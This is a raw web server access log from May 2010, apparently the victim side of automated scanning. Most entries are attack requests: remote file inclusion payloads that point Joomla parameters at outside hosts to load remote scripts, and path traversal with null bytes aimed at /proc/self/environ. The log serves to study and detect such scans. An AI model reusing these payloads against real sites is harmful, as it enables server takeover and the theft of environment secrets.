81.92.204.67 - - [31/May/2010:02:47:20 -0500] "GET /logs//journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:47:20 -0500] "GET /logs/access_log.1271548800//journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:47:21 -0500] "GET //journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:47:21 -0500] "GET /logs/access_log.1271548800//journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:47:21 -0500] "GET /logs//journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:47:21 -0500] "GET //journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:47:21 -0500] "GET /logs//journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:47:22 -0500] "GET //journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:47:22 -0500] "GET /logs//journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:47:22 -0500] "GET /logs/access_log.1271548800//journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:47:31 -0500] "GET //journal.php3//components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_li=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:47:31 -0500] "GET /logs//journal.php3//components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_li=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:47:35 -0500] "GET /logs/access_log.1271548800//journal.php3//components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_li=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 378 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:47:36 -0500] "GET /logs//journal.php3//components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_li=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:47:36 -0500] "GET //journal.php3//components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_li=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:47:43 -0500] "GET /logs/access_log.1271548800//journal.php3//components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_li=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 378 "-""Mozilla/5.0"
67.210.98.40 - - [31/May/2010:02:48:04 -0500] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://syszone.co.kr/bbs/icon/private_name/image1.jpg??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
67.210.98.40 - - [31/May/2010:02:48:04 -0500] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://syszone.co.kr/bbs/icon/private_name/image1.jpg??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
67.210.98.40 - - [31/May/2010:02:48:04 -0500] "GET /logs/access_log.1271548800//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://syszone.co.kr/bbs/icon/private_name/image1.jpg??? HTTP/1.1" 404 369 "-""Mozilla/5.0"
74.14.231.236 - - [31/May/2010:02:51:15 -0500] "GET /logs/access_log.1273017600//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 309 "-""libwww-perl/5.805"
81.92.204.67 - - [31/May/2010:02:51:36 -0500] "GET /logs//journal.php3//components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_li=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:51:36 -0500] "GET //journal.php3//components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_li=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:51:36 -0500] "GET /logs/access_log.1273017600//journal.php3//components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_li=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 378 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:51:44 -0500] "GET /logs/access_log.1273017600//journal.php3//components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_li=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 378 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:51:44 -0500] "GET //journal.php3//components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_li=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:51:44 -0500] "GET /logs//journal.php3//components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_li=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:53:16 -0500] "GET /logs//journal.php3//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_pat=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:53:16 -0500] "GET //journal.php3//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_pat=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:53:16 -0500] "GET /logs/access_log.1270857600//journal.php3//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_pat=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 368 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:53:41 -0500] "GET //journal.php3//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_pat=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:53:41 -0500] "GET /logs/access_log.1270857600//journal.php3//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_pat=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 368 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:53:41 -0500] "GET /logs//journal.php3//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_pat=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:54:00 -0500] "GET //journal.php3//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_pat=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:54:00 -0500] "GET /logs/access_log.1270857600//journal.php3//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_pat=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 368 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:54:00 -0500] "GET /logs//journal.php3//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_pat=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:54:02 -0500] "GET /logs/access_log.1263081600//journal.php3//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_pat=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 368 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:54:08 -0500] "GET //journal.php3//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_pat=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:54:08 -0500] "GET /logs//journal.php3//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_pat=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:54:08 -0500] "GET /logs/access_log.1270857600//journal.php3//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_pat=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 368 "-""Mozilla/5.0"
213.186.60.116 - - [31/May/2010:02:54:18 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
213.186.60.116 - - [31/May/2010:02:54:19 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
81.92.204.67 - - [31/May/2010:02:54:20 -0500] "GET //journal.php3//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_pat=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:54:20 -0500] "GET /logs/access_log.1270857600//journal.php3//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_pat=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 368 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:54:20 -0500] "GET /logs//journal.php3//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_pat=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:54:22 -0500] "GET /logs/access_log.1263081600//journal.php3//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_pat=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 368 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:54:36 -0500] "GET /logs/access_log.1263081600//journal.php3//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_pat=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 368 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:54:52 -0500] "GET /logs/access_log.1263081600//journal.php3//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_pat=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 368 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:55:14 -0500] "GET /logs/access_log.1263081600//journal.php3//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_pat=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 368 "-""Mozilla/5.0"
213.186.60.116 - - [31/May/2010:02:55:30 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
69.175.75.82 - - [31/May/2010:02:55:35 -0500] "GET /logs/*.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
69.175.75.82 - - [31/May/2010:02:55:35 -0500] "GET /*.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
213.186.60.116 - - [31/May/2010:02:55:40 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.0.30 - - [31/May/2010:02:55:42 -0500] "GET /logs/*.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.0.30 - - [31/May/2010:02:55:43 -0500] "GET /*.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
80.233.172.42 - - [31/May/2010:02:55:45 -0500] "GET /logs/*.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
80.233.172.42 - - [31/May/2010:02:55:45 -0500] "GET /*.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
89.145.108.230 - - [31/May/2010:02:55:50 -0500] "GET /logs/*.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
89.145.108.230 - - [31/May/2010:02:55:50 -0500] "GET /*.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
87.250.255.243 - - [31/May/2010:02:55:52 -0500] "GET /tattoo/set3.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
89.107.213.98 - - [31/May/2010:02:55:53 -0500] "GET /logs/*.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
89.107.213.98 - - [31/May/2010:02:55:54 -0500] "GET /*.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
193.41.235.46 - - [31/May/2010:02:55:54 -0500] "GET /logs/*.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
193.41.235.46 - - [31/May/2010:02:55:54 -0500] "GET /*.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.808"
213.186.60.116 - - [31/May/2010:02:55:57 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
89.107.213.98 - - [31/May/2010:02:55:58 -0500] "GET /logs/*.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
89.107.213.98 - - [31/May/2010:02:55:58 -0500] "GET /*.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
213.186.60.116 - - [31/May/2010:02:56:07 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
89.107.213.98 - - [31/May/2010:02:56:24 -0500] "GET /logs/*.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
89.107.213.98 - - [31/May/2010:02:56:24 -0500] "GET /*.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
192.167.114.31 - - [31/May/2010:02:58:03 -0500] "GET /logs/*.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.820"
192.167.114.31 - - [31/May/2010:02:58:08 -0500] "GET /*.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.820"
69.175.75.82 - - [31/May/2010:02:58:16 -0500] "GET /logs/*.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
69.175.75.82 - - [31/May/2010:02:58:16 -0500] "GET /*.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
69.175.75.82 - - [31/May/2010:02:58:25 -0500] "GET /logs/*.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
69.175.75.82 - - [31/May/2010:02:58:25 -0500] "GET /*.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
69.175.75.82 - - [31/May/2010:02:58:55 -0500] "GET /logs/*.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
69.175.75.82 - - [31/May/2010:02:58:55 -0500] "GET /*.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
67.228.226.12 - - [31/May/2010:03:01:30 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
84.53.217.109 - - [31/May/2010:03:01:43 -0500] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://syszone.co.kr/bbs/icon/private_name/image1.jpg??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
84.53.217.109 - - [31/May/2010:03:01:43 -0500] "GET /logs/access_log.1271548800//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://syszone.co.kr/bbs/icon/private_name/image1.jpg??? HTTP/1.1" 404 369 "-""Mozilla/5.0"
84.53.217.109 - - [31/May/2010:03:01:43 -0500] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://syszone.co.kr/bbs/icon/private_name/image1.jpg??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
64.120.126.77 - - [31/May/2010:03:01:58 -0500] "HEAD /costume/costume1.htm HTTP/1.1" 200 0 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729)"
95.156.233.139 - - [31/May/2010:03:02:21 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
95.156.233.139 - - [31/May/2010:03:02:21 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
95.156.233.139 - - [31/May/2010:03:02:21 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
95.156.233.139 - - [31/May/2010:03:02:21 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
69.175.75.82 - - [31/May/2010:03:02:39 -0500] "GET /logs/*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
69.175.75.82 - - [31/May/2010:03:02:39 -0500] "GET /*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
91.121.145.89 - - [31/May/2010:03:02:42 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.145.89 - - [31/May/2010:03:02:42 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
76.12.58.212 - - [31/May/2010:03:02:42 -0500] "GET /logs//tags.php?BBCodeFile=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
76.12.58.212 - - [31/May/2010:03:02:42 -0500] "GET //tags.php?BBCodeFile=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
80.233.172.42 - - [31/May/2010:03:02:52 -0500] "GET /logs/*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
80.233.172.42 - - [31/May/2010:03:02:53 -0500] "GET /*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
91.121.104.108 - - [31/May/2010:03:03:00 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.104.108 - - [31/May/2010:03:03:00 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.0.30 - - [31/May/2010:03:03:01 -0500] "GET /logs/*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.0.30 - - [31/May/2010:03:03:01 -0500] "GET /*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
193.41.235.46 - - [31/May/2010:03:03:05 -0500] "GET /logs/*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
193.41.235.46 - - [31/May/2010:03:03:05 -0500] "GET /*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.808"
89.145.108.230 - - [31/May/2010:03:03:29 -0500] "GET /logs/*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
89.145.108.230 - - [31/May/2010:03:03:29 -0500] "GET /*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
69.175.75.82 - - [31/May/2010:03:03:44 -0500] "GET /logs/*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
69.175.75.82 - - [31/May/2010:03:03:44 -0500] "GET /*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
192.167.114.31 - - [31/May/2010:03:03:45 -0500] "GET /logs/*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.820"
192.167.114.31 - - [31/May/2010:03:03:45 -0500] "GET /*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.820"
193.41.235.46 - - [31/May/2010:03:04:03 -0500] "GET /logs/*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
193.41.235.46 - - [31/May/2010:03:04:03 -0500] "GET /*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.808"
69.175.75.82 - - [31/May/2010:03:04:15 -0500] "GET /logs/*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
69.175.75.82 - - [31/May/2010:03:04:15 -0500] "GET /*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
